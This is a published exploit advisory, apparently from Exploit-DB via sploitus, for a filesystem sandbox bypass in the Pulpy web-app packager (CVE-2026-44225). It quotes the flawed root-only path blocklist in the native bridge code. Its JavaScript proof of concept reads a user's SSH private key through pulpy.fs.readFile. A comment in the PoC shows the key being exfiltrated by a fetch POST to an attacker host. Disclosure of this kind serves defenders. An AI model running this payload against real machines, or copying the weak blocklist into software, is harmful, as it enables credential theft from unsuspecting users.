## https://sploitus.com/exploit?id=EDB-ID:52616
# Exploit Title: Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass
# Google Dork: N/A
# Date: 2026-06-19
# Exploit Author: Onur BILICI @basekill
# Vendor Homepage: https://github.com/enesgkky/pulpy
# Software Link: https://github.com/enesgkky/pulpy
# Version: <= 0.1.1-Beta
# Tested on: macOS, Linux
# CVE: CVE-2026-44225
Description:
Pulpy injects a 'pulpy.fs' JavaScript API into every packaged web application,
granting it access to the host filesystem. A 'validateFsPath()' function is
implemented to sandbox this access using a blocklist. However, this blocklist
is incomplete.
The implementation only catches root-level paths (e.g., matching "/Library/"
at index 0), meaning it completely misses user-specific paths such as
"/Users/<username>/Library/" or critical configuration directories like
"~/.ssh/", "~/.aws/", and "~/Documents/".
As a result, any malicious web application packaged with Pulpy can bypass the
sandbox to read and write arbitrary sensitive files in the user's home directory.
Root Cause Analysis:
In 'src/bridge/native_modules.mm', the path validation logic relies on a weak
prefix check:
std::string normalized = fs::weakly_canonical(p).string();
if (normalized.find("/etc/") == 0 ||
normalized.find("/var/") == 0 ||
normalized.find("/usr/") == 0 ||
normalized.find("/System/") == 0 ||
normalized.find("/Library/") == 0) {
return "";
}
return normalized;
Proof of Concept (PoC):
An attacker can execute the following JavaScript code within a Pulpy-packaged
application to exfiltrate sensitive user data:
```javascript
// Bypassing the sandbox to read sensitive files from the user's home directory
try {
// Example target: SSH private key
// Note: You need to replace '<username>' with the target's actual username or dynamically resolve it
const sshKeyPath = "/Users/<username>/.ssh/id_rsa";
pulpy.fs.readFile(sshKeyPath, 'utf8', (err, data) => {
if (err) {
console.error("Failed to read file:", err);
return;
}
console.log("Successfully bypassed sandbox! Content:\n", data);
// Exfiltration logic can be placed here (e.g., fetch('[https://attacker.com/log](https://attacker.com/log)', {method: 'POST', body: data}))
});
} catch (e) {
console.error("Exploit failed:", e);
}